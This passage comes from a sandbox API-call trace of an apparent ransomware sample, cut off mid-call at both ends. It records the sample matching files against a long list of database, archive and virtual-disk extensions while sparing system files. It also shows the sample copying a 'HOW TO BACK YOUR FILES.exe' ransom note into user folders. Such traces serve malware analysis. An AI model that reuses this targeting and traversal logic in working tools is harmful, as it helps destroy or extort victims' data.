(lpString1="lnk", lpString2="nyf") returned -1 [0040.309] lstrlenW (lpString="odb") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0040.309] lstrlenW (lpString="odb") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0040.309] lstrlenW (lpString="oqy") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0040.309] lstrlenW (lpString="ora") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0040.309] lstrlenW (lpString="orx") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0040.309] lstrlenW (lpString="owc") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0040.309] lstrlenW (lpString="p96") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0040.309] lstrlenW (lpString="p97") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0040.309] lstrlenW (lpString="pan") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0040.309] lstrlenW (lpString="pdb") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0040.309] lstrlenW (lpString="pdm") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0040.309] lstrlenW (lpString="pnz") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0040.309] lstrlenW (lpString="qry") returned 3 [0040.309] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0040.310] lstrlenW (lpString="qvd") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0040.310] lstrlenW (lpString="rbf") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0040.310] lstrlenW (lpString="rctd") returned 4 [0040.310] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0040.310] lstrlenW (lpString="rod") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0040.310] lstrlenW (lpString="rodx") returned 4 [0040.310] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0040.310] lstrlenW (lpString="rpd") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0040.310] lstrlenW (lpString="rsd") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0040.310] lstrlenW (lpString="sas7bdat") returned 8 [0040.310] lstrcmpiW (lpString1="er X.lnk", lpString2="sas7bdat") returned -1 [0040.310] lstrlenW (lpString="sbf") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0040.310] lstrlenW (lpString="scx") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0040.310] lstrlenW (lpString="sdb") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0040.310] lstrlenW (lpString="sdc") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0040.310] lstrlenW (lpString="sdf") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0040.310] lstrlenW (lpString="sis") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0040.310] lstrlenW (lpString="spq") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0040.310] lstrlenW (lpString="te") returned 2 [0040.310] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0040.310] lstrlenW (lpString="teacher") returned 7 [0040.310] lstrcmpiW (lpString1="r X.lnk", lpString2="teacher") returned -1 [0040.310] lstrlenW (lpString="tmd") returned 3 [0040.310] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0040.311] lstrlenW (lpString="tps") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0040.311] lstrlenW (lpString="trc") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0040.311] lstrlenW (lpString="trc") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0040.311] lstrlenW (lpString="trm") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0040.311] lstrlenW (lpString="udb") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0040.311] lstrlenW (lpString="udl") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0040.311] lstrlenW (lpString="usr") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0040.311] lstrlenW (lpString="v12") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0040.311] lstrlenW (lpString="vis") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0040.311] lstrlenW (lpString="vpd") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0040.311] lstrlenW (lpString="vvv") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0040.311] lstrlenW (lpString="wdb") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0040.311] lstrlenW (lpString="wmdb") returned 4 [0040.311] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0040.311] lstrlenW (lpString="wrk") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0040.311] lstrlenW (lpString="xdb") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0040.311] lstrlenW (lpString="xld") returned 3 [0040.311] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0040.311] lstrlenW (lpString="xmlff") returned 5 [0040.311] lstrcmpiW (lpString1="X.lnk", lpString2="xmlff") returned -1 [0040.311] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.311] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.312] lstrlenW (lpString="desktop.ini") returned 11 [0040.312] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 42 [0040.312] lstrcpyW (in: lpString1=0x2e2e890, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.312] lstrlenW (lpString="desktop.ini") returned 11 [0040.312] lstrlenW (lpString="Ares865") returned 7 [0040.312] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.312] lstrlenW (lpString=".dll") returned 4 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.312] lstrlenW (lpString=".lnk") returned 4 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.312] lstrlenW (lpString=".ini") returned 4 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.312] lstrlenW (lpString=".sys") returned 4 [0040.312] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.312] lstrlenW (lpString="desktop.ini") returned 11 [0040.312] lstrlenW (lpString="bak") returned 3 [0040.312] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.312] lstrlenW (lpString="ba_") returned 3 [0040.312] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.312] lstrlenW (lpString="dbb") returned 3 [0040.312] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.312] lstrlenW (lpString="vmdk") returned 4 [0040.312] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.312] lstrlenW (lpString="rar") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.313] lstrlenW (lpString="zip") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.313] lstrlenW (lpString="tgz") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.313] lstrlenW (lpString="vbox") returned 4 [0040.313] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.313] lstrlenW (lpString="vdi") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.313] lstrlenW (lpString="vhd") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.313] lstrlenW (lpString="vhdx") returned 4 [0040.313] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.313] lstrlenW (lpString="avhd") returned 4 [0040.313] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.313] lstrlenW (lpString="db") returned 2 [0040.313] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.313] lstrlenW (lpString="db2") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.313] lstrlenW (lpString="db3") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.313] lstrlenW (lpString="dbf") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.313] lstrlenW (lpString="mdf") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.313] lstrlenW (lpString="mdb") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.313] lstrlenW (lpString="sql") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.313] lstrlenW (lpString="sqlite") returned 6 [0040.313] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.313] lstrlenW (lpString="sqlite3") returned 7 [0040.313] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.313] lstrlenW (lpString="sqlitedb") returned 8 [0040.313] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.313] lstrlenW (lpString="xml") returned 3 [0040.313] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.314] lstrlenW (lpString="$er") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.314] lstrlenW (lpString="4dd") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.314] lstrlenW (lpString="4dl") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.314] lstrlenW (lpString="^^^") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.314] lstrlenW (lpString="abs") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.314] lstrlenW (lpString="abx") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.314] lstrlenW (lpString="accdb") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.314] lstrlenW (lpString="accdc") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.314] lstrlenW (lpString="accde") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.314] lstrlenW (lpString="accdr") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.314] lstrlenW (lpString="accdt") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.314] lstrlenW (lpString="accdw") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.314] lstrlenW (lpString="accft") returned 5 [0040.314] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.314] lstrlenW (lpString="adb") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.314] lstrlenW (lpString="adb") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.314] lstrlenW (lpString="ade") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.314] lstrlenW (lpString="adf") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.314] lstrlenW (lpString="adn") returned 3 [0040.314] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.315] lstrlenW (lpString="adp") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.315] lstrlenW (lpString="alf") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.315] lstrlenW (lpString="ask") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.315] lstrlenW (lpString="btr") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.315] lstrlenW (lpString="cat") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.315] lstrlenW (lpString="cdb") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.315] lstrlenW (lpString="ckp") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.315] lstrlenW (lpString="cma") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.315] lstrlenW (lpString="cpd") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.315] lstrlenW (lpString="dacpac") returned 6 [0040.315] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.315] lstrlenW (lpString="dad") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.315] lstrlenW (lpString="dadiagrams") returned 10 [0040.315] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.315] lstrlenW (lpString="daschema") returned 8 [0040.315] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.315] lstrlenW (lpString="db-journal") returned 10 [0040.315] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.315] lstrlenW (lpString="db-shm") returned 6 [0040.315] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.315] lstrlenW (lpString="db-wal") returned 6 [0040.315] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.315] lstrlenW (lpString="dbc") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.315] lstrlenW (lpString="dbs") returned 3 [0040.315] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.315] lstrlenW (lpString="dbt") returned 3 [0040.316] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.316] lstrlenW (lpString="dbv") returned 3 [0040.316] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.316] lstrlenW (lpString="dbx") returned 3 [0040.316] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.316] lstrlenW (lpString="dcb") returned 3 [0040.316] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.316] lstrcpyW (in: lpString1=0x2e2e890, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0040.316] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0040.316] lstrlenW (lpString="Ares865") returned 7 [0040.316] lstrcmpiW (lpString1="ome.lnk", lpString2="Ares865") returned 1 [0040.316] lstrlenW (lpString=".dll") returned 4 [0040.316] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".dll") returned 1 [0040.316] lstrlenW (lpString=".lnk") returned 4 [0040.316] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".lnk") returned 1 [0040.316] lstrlenW (lpString=".ini") returned 4 [0040.316] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".ini") returned 1 [0040.316] lstrlenW (lpString=".sys") returned 4 [0040.316] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".sys") returned 1 [0040.316] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0040.316] lstrcpyW (in: lpString1=0x2e2e890, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0040.316] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0040.316] lstrlenW (lpString="Ares865") returned 7 [0040.316] lstrcmpiW (lpString1="fox.lnk", lpString2="Ares865") returned 1 [0040.316] lstrlenW (lpString=".dll") returned 4 [0040.316] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".dll") returned 1 [0040.316] lstrlenW (lpString=".lnk") returned 4 [0040.316] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".lnk") returned 1 [0040.316] lstrlenW (lpString=".ini") returned 4 [0040.316] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".ini") returned 1 [0040.316] lstrlenW (lpString=".sys") returned 4 [0040.316] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".sys") returned 1 [0040.317] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0040.317] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User", iMaxLength=260 | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0040.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed020 | out: hHeap=0x2b0000) returned 1 [0040.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0040.317] lstrlenW (lpString="C:\\Users\\Default User") returned 21 [0040.317] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0040.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.317] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.322] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49aeaa40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.322] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.322] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.322] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49aeaa40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.322] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.322] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.322] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.322] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.322] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2="aoldtz.exe") returned 1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0040.322] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="temp") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="ntuser.dat") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="perflogs") returned -1 [0040.323] lstrcmpiW (lpString1="AppData", lpString2="MSBuild") returned -1 [0040.323] lstrlenW (lpString="AppData") returned 7 [0040.323] lstrlenW (lpString="C:\\Users\\Default User\\*") returned 23 [0040.323] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0040.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0040.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6240 [0040.323] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b90 | out: ListHead=0x2e77d0, ListEntry=0x2e7b90) returned 0x2e7b70 [0040.323] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="aoldtz.exe") returned 1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="temp") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="perflogs") returned -1 [0040.323] lstrcmpiW (lpString1="Application Data", lpString2="MSBuild") returned -1 [0040.323] lstrlenW (lpString="Application Data") returned 16 [0040.323] lstrlenW (lpString="C:\\Users\\Default User\\AppData") returned 29 [0040.323] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0040.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0040.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e) returned 0x2ed7f0 [0040.323] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cb0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cb0) returned 0x2e7b90 [0040.323] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0040.323] lstrcmpiW (lpString1="Contacts", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="aoldtz.exe") returned 1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="bootmgr") returned 1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="temp") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="pagefile.sys") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="boot") returned 1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="ids.txt") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="ntuser.dat") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="perflogs") returned -1 [0040.324] lstrcmpiW (lpString1="Contacts", lpString2="MSBuild") returned -1 [0040.324] lstrlenW (lpString="Contacts") returned 8 [0040.324] lstrlenW (lpString="C:\\Users\\Default User\\Application Data") returned 38 [0040.324] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0040.324] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Contacts", dwFileAttributes=0x10) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0040.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e6288 [0040.324] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cd0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cd0) returned 0x2e7cb0 [0040.324] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 